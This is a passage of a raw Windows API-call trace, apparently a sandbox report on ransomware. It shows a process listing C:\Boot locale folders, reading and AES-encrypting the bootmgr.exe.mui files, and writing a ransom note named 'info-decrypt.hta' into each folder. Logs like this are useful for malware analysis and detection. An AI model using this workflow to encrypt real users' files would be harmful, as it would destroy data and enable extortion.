lpFileInformation=0x36b4bf4 | out: lpFileInformation=0x36b4bf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0179.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0179.871] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0179.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0179.871] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0179.871] GetFileType (hFile=0x264) returned 0x1 [0179.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0179.871] GetFileType (hFile=0x264) returned 0x1 [0179.871] GetFileSize (in: hFile=0x264, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x16250 [0179.872] ReadFile (in: hFile=0x264, lpBuffer=0x8c6f4a8, nNumberOfBytesToRead=0x16250, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x8c6f4a8*, lpNumberOfBytesRead=0x6a7f1bc*=0x16250, lpOverlapped=0x0) returned 1 [0179.875] CloseHandle (hObject=0x264) returned 1 [0179.875] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66baa70) returned 1 [0179.893] CryptGenRandom (in: hProv=0x66baa70, dwLen=0x10, pbBuffer=0x36b50b4 | out: pbBuffer=0x36b50b4) returned 1 [0181.727] CryptImportKey (in: hProv=0x66baa70, pbData=0x36ed248, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7fad0) returned 1 [0181.727] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0181.727] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0181.727] CryptDuplicateKey (in: hKey=0xb7fad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f190) returned 1 [0181.727] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0181.727] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x4, pbData=0x36ed328*=0x1, dwFlags=0x0) returned 1 [0181.727] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x1, pbData=0x36ed2f4, dwFlags=0x0) returned 1 [0181.728] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c85718*, pdwDataLen=0x6a7f188*=0x16260, dwBufLen=0x16260 | out: pbData=0x8c85718*, pdwDataLen=0x6a7f188*=0x16260) returned 1 [0181.729] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36ed350*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x36ed350*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0181.730] CryptDestroyKey (hKey=0xb7fad0) returned 1 [0181.730] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0181.731] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0181.731] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0181.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0181.731] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0181.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0181.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0181.733] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0181.733] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\", lpFilePart=0x0) returned 0xe [0181.733] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fad0 [0181.733] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0181.734] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0181.734] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0181.734] FindClose (in: hFindFile=0xb7fad0 | out: hFindFile=0xb7fad0) returned 1 [0181.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0181.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0181.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0181.734] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0181.734] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\", lpFilePart=0x0) returned 0xe [0181.734] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fad0 [0181.734] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0181.735] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0181.735] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0181.735] FindClose (in: hFindFile=0xb7fad0 | out: hFindFile=0xb7fad0) returned 1 [0181.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0181.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0181.735] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0181.735] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0181.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0181.735] GetFileAttributesExW (in: lpFileName="C:\\Boot\\pl-PL\\info-decrypt.hta" (normalized: "c:\\boot\\pl-pl\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0181.736] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0181.736] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0181.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0181.736] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\info-decrypt.hta" (normalized: "c:\\boot\\pl-pl\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5a0 [0181.736] GetFileType (hFile=0x5a0) returned 0x1 [0181.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0181.736] GetFileType (hFile=0x5a0) returned 0x1 [0181.737] WriteFile (in: hFile=0x5a0, lpBuffer=0x36f01c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x36f01c8*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0181.737] WriteFile (in: hFile=0x5a0, lpBuffer=0x36f01c8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x36f01c8*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0181.737] CloseHandle (hObject=0x5a0) returned 1 [0181.737] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0181.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0181.738] GetFileAttributesExW (in: lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x36f11e4 | out: lpFileInformation=0x36f11e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0181.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0181.738] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0181.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0181.738] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0181.738] GetFileType (hFile=0x5a0) returned 0x1 [0181.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0181.738] GetFileType (hFile=0x5a0) returned 0x1 [0181.738] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x16250 [0181.738] ReadFile (in: hFile=0x5a0, lpBuffer=0x8c9b998, nNumberOfBytesToRead=0x16250, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x8c9b998*, lpNumberOfBytesRead=0x6a7f1bc*=0x16250, lpOverlapped=0x0) returned 1 [0181.890] CloseHandle (hObject=0x5a0) returned 1 [0181.890] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66baeb0) returned 1 [0181.892] CryptGenRandom (in: hProv=0x66baeb0, dwLen=0x10, pbBuffer=0x3739980 | out: pbBuffer=0x3739980) returned 1 [0182.358] CryptImportKey (in: hProv=0x66baeb0, pbData=0x397c4d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f810) returned 1 [0182.358] CryptContextAddRef (hProv=0x66baeb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.358] CryptContextAddRef (hProv=0x66baeb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.358] CryptDuplicateKey (in: hKey=0xb7f810, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f650) returned 1 [0182.358] CryptContextAddRef (hProv=0x66baeb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.358] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x4, pbData=0x397c5b8*=0x1, dwFlags=0x0) returned 1 [0182.358] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x1, pbData=0x397c584, dwFlags=0x0) returned 1 [0182.359] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb1c08*, pdwDataLen=0x6a7f188*=0x16260, dwBufLen=0x16260 | out: pbData=0x8cb1c08*, pdwDataLen=0x6a7f188*=0x16260) returned 1 [0182.360] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397c5e0*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x397c5e0*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0182.361] CryptDestroyKey (hKey=0xb7f810) returned 1 [0182.361] CryptReleaseContext (hProv=0x66baeb0, dwFlags=0x0) returned 1 [0182.361] CryptReleaseContext (hProv=0x66baeb0, dwFlags=0x0) returned 1 [0182.361] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0182.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0182.361] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0182.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0182.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0182.363] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0182.363] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\", lpFilePart=0x0) returned 0xe [0182.363] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f810 [0182.363] FindNextFileW (in: hFindFile=0xb7f810, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.364] FindNextFileW (in: hFindFile=0xb7f810, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0182.364] FindNextFileW (in: hFindFile=0xb7f810, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.364] FindClose (in: hFindFile=0xb7f810 | out: hFindFile=0xb7f810) returned 1 [0182.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0182.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0182.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0182.364] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0182.364] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\", lpFilePart=0x0) returned 0xe [0182.364] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f810 [0182.364] FindNextFileW (in: hFindFile=0xb7f810, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.365] FindNextFileW (in: hFindFile=0xb7f810, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0182.365] FindNextFileW (in: hFindFile=0xb7f810, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0182.365] FindClose (in: hFindFile=0xb7f810 | out: hFindFile=0xb7f810) returned 1 [0182.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0182.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0182.365] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0182.365] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0182.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0182.365] GetFileAttributesExW (in: lpFileName="C:\\Boot\\pt-BR\\info-decrypt.hta" (normalized: "c:\\boot\\pt-br\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0182.376] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0182.376] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0182.376] 